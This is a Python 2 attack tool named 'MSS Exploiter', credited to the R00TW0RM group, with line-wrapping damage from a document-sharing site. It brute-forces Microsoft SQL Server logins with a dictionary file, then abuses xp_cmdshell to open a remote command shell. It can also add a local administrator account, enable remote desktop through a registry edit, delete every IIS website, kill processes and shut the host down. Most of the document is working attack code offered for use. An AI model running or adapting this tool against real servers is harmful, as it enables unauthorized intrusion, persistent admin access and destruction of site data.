Vous êtes sur la page 1sur 9

#!

/usr/bin/python
# Author: [C]orrupted[B]yte
# (c)R00TW0RM - Private Community
# http://r00tw0rm.com/
# Greets: To all members of ROOTW0RM
#
# pwd: R00tW0rmTeam
# apt-get install python-setuptools
# wget http://cython.org/release/Cython-0.16.tar.gz & tar -xzvf Cython-0.16.tar.
gz & cd Cy* & ./setup.py install
# apt-get install rdesktop
#
# [1]Start microsoft shell
# [2]Create user with administrative permissions
# [3]Enable remote desktop
# [4]Disable remote desktop
# [5]connect with remote desktop
# [6]SQL Mannager
# [7]Process killer
# [8]Delete all websites
# [9]Stop/start/restart web server (IIS)
# [10]Shutdown PC
import pymssql
import os
import time
class MSSExploiter():
#Simple dictionary attack
@staticmethod
def dictAttack(dictFile, dbHost, dbUser):
i = 0
try:
f = open(dictFile, 'r')
while True:
i = i + 1
line = f.readline()
if not line: break
dbPass = line.strip()
if (i == 47):
print '[!]unable to find the password try again'
break
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=db
Pass)
input('[!]Succesfull connection with password: ' +dbPass)
break
except:
print 'Working...'
continue
except:
print '[!]Imposible open dictionary'
time.sleep(3)
#Microsoft SQL Server Shell
@staticmethod
def mssShell(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()

cur = conn.cursor()
cur.execute("exec master.dbo.xp_cmdshell 'hostname'")
hostname = cur.fetchone()
command = 'y'
command = raw_input(hostname[0] +'~$ ')
while command != 'exit':
cur.execute("exec master.dbo.xp_cmdshell '%s'" % command)
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
command = raw_input(hostname[0] +'~$ ')
conn.close()
#Function for IIS manipulation
@staticmethod
def iisManipulation(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()
cur = conn.cursor()
print '::.IIS Manipulation.::'
print '1.-Start iis'
print '2.-Stop iis'
print '3.-Restart iis'
print '4.-Check iis status'
op = '1'
while op:
op = raw_input('Choise an option: ')
if op == '1':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /start'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == '2':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /stop'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == '3':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /restart'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == '4':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /status'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == 'exit':
conn.close()
break
else:
print 'Select a correct option...'
op = raw_input('Choise an option: ')

#Delete all websites in IIS server


@staticmethod
def deleteWebsites(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()
cur = conn.cursor()
cur.execute("exec master.dbo.xp_cmdshell 'rmdir /s /q C:\Inetpub\wwwroot
\'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
time.sleep(3)
conn.close()
#Create admin user
@staticmethod
def createAdminUser(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print '[!]Error'
cur = conn.cursor()
adminUser = raw_input('Introduce the new username: ')
adminPass = raw_input('Introduce the new password: ')
cur.execute("exec master.dbo.xp_cmdshell 'net user %s %s /add'" % (admin
User, adminPass))
cur.execute("exec master.dbo.xp_cmdshell 'net localgroup Administrators
%s /add'" % adminUser)
print '[!]User %s with password %s created successfully' % (adminUser, a
dminPass)
time.sleep(3)
conn.close()
#Enableremote desktop
@staticmethod
def enableDesktop(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
cur = conn.cursor()
enablingCmd = 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
cur.execute("exec master.dbo.xp_cmdshell '%s'" % enablingCmd)
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
except:
print '[!]Connection faulier'
conn.close()
#Disable remote desktop
@staticmethod
def disableDesktop(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
cur = conn.cursor()
disablingCmd = 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'
cur.execute("exec master.dbo.xp_cmdshell '%s'" % disablingCmd)

row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
except:
print '[!]Connection faulier'
conn.close()
#Remote desktop
@staticmethod
def remoteConn(dbHost):
try:
os.system("rdesktop %s" % dbHost)
except:
print 'unable to conect with host %s' %host
#shutdown computer
@staticmethod
def shutDownPc(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()
cur = conn.cursor()
try:
cur.execute("exec master.dbo.xp_cmdshell 'shutdown /s /f'")
print 'shutting down in 30 seconds...'
time.sleep(5)
except:
print 'cannot shutdown the PC'
time.sleep(3)
conn.close()
#kill porcess
@staticmethod
def killProcess(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print '[!]Connection faulier'
exit()
cur = conn.cursor()
cur.execute("exec master.dbo.xp_cmdshell 'tasklist'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
PID = raw_input('Introduce PID process to kill: ')
cur.execute("exec master.dbo.xp_cmdshell 'taskkill /PID %s'" % PID)
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
time.sleep(3)
conn.close()
#SQL Manager
@staticmethod
def sqlManager(dbHost, dbUser, dbPass):
print '::.SQL Manager.::'
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass, da
tabase='master')

cur = conn.cursor()
cur.execute('SELECT * FROM master.dbo.SysDatabases')
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
except:
print 'Connection faulier'
exit()
dbName = raw_input('Choise a database: ')
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass, databa
se=dbName)
cur = conn.cursor()
command = 'y'
command = raw_input('SQL Manager~$ ')
while command != 'exit':
if command == 'SHOW TABLES':
cur.execute("SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE
_TYPE = 'BASE TABLE'")
row = cur.fetchone()
while row:
print row[2]
row = cur.fetchone()
try:
cur.execute('%s' % command)
row = cur.fetchone()
while row:
print row
row = cur.fetchone()
except:
print ''
command = raw_input('SQL Manager~$ ')
class main():
#Main function
def mainMenu():
print '___ ___ _____ _____ _____
_
_ _'
print '| \/ |/ ___/ ___| | ___|
| |
(_) |'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _| |_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| | __/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | | || __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Enter SQL credentials'
print '[2]Dictionary attack'
op = raw_input('Choise an option: ')
while op:
if op == '1':
os.system('clear')
dbHost = raw_input('Introduce the ip host to connect: ')
dbUser = raw_input('Introduce the DB user: ')
dbPass = raw_input('Introduce the DB password: ')
os.system('clear')
print '___ ___ _____ _____ _____
_
_ _'
print '| \/ |/ ___/ ___| | ___|
| |
(_) |'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _| |_ ___
_ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| | __/ _ \

__|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | | || __/
|'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|\__\___|
_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
while op:
if op == '1':
os.system('clear')
f = MSSExploiter()
f.mssShell(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_

_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '2':
os.system('clear')
f = MSSExploiter()
f.createAdminUser(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_
_
_'

print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '3':
f = MSSExploiter()
f.enableDesktop(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == '4':
f = MSSExploiter()
f.disableDesktop(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == '5':
f = MSSExploiter()
f.remoteConn(dbHost)
op = raw_input('\nChoise an option: ')
elif op == '6':
os.system('clear')
f = MSSExploiter()
f.sqlManager(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_
_
_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print
print
print
print
print
print

'
| |'
'
|_|'
'(c)R00TW0RM Coders Team - Private Community'
'.::Coded by [C]orrupted[B]yte::.\n'
'[1]Start microsoft shell'
'[2]Create user with administrative permissions'

print '[3]Enable remote desktop'


print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '7':
os.system('clear')
f = MSSExploiter()
f.killProcess(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_

_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '8':
f = MSSExploiter()
f.deleteWebsites(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == '9':
os.system('clear')
f = MSSExploiter()
f.iisManipulation(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_
_
_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'

print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|


\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '10':
f = MSSExploiter()
f.shutDownPc(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == 'exit':
break
else:
print 'Select a correct option...'
op = raw_input('Choise an option: ')
elif op == '2':
os.system('clear')
f = MSSExploiter()
dictFile = raw_input('Introduce the dictionary passwords name: '
)
dbUser = raw_input('Introduce user DB to try: ')
dbHost = raw_input('Introduce the ip host to attack: ')
f.dictAttack(dictFile, dbHost, dbUser)
os.system('clear')
print '___ ___ _____ _____ _____
_
_ _'
print '| \/ |/ ___/ ___| | ___|
| |
(_) |'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _| |_ ___
_ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| | __/ _ \
__|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | | || __/
|'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|\__\___|
_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Enter SQL credentials'
print '[2]Dictionary attack'
op = raw_input('Choise an option: ')
elif op == 'exit':
break
else:
print 'Select a correct option...'
op = raw_input('Choise an option: ')
os.system('clear')
mainMenu()